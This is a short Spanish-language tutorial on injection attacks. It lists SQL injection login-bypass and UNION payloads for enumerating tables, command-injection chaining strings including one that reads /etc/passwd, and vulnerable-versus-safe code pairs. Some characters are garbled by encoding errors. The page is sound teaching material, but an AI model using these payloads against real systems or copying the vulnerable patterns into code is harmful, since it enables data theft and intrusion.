Inyección de código malicioso en aplicaciones. Incluye SQL Injection, NoSQL Injection, Command Injection, LDAP Injection y XSS. Un clásico que sigue sióndo devastadoramente efectivo.
Injection ocurre cuando datos no confiables son enviados a un int�rprete como parte de un comando o consulta. El aéééticante puede hacer que el int�rprete ejecute comandos no intenciónados o acceda a datos sin autorización.
Practica únicamente en entornos autorizados como labs de seguridad.
# En campos de login/búsqueda ' # Error de sintaxis? ' OR '1'='1 # Bypass de login ' OR 1=1-- # Comentar resto de query ' UNION SELECT null-- # Determinar columnas
-- Determinar número de columnas ' ORDER BY 1-- ' ORDER BY 2-- ' ORDER BY 3-- -- Error = 2 columnas -- Extraer versión de DB ' UNION SELECT null,@@versión-- -- Listar tablas (MySQL) ' UNION SELECT table_name,null FROM information_schema.tables--
// ? VULNERABLE - Concatenación const query = `SELECT * FROM users WHERE id = ${userId}`; // ? SEGURO - Consultas parametrizadas const query = 'SELECT * FROM users WHERE id = ?'; db.query(query, [userId]);
# Encadenamiento de comandos ; id | whoami `id` $(whoami) # Ejemplo: ping vulnerable 127.0.0.1; cat /etc/passwd 127.0.0.1 | ls -la
# ? VULNERABLE os.system(f"ping {user_input}") # ? SEGURO - usar arrays, no shell subprocess.run(["ping", "-c", "4", validated_ip], shell=False, capture_output=True)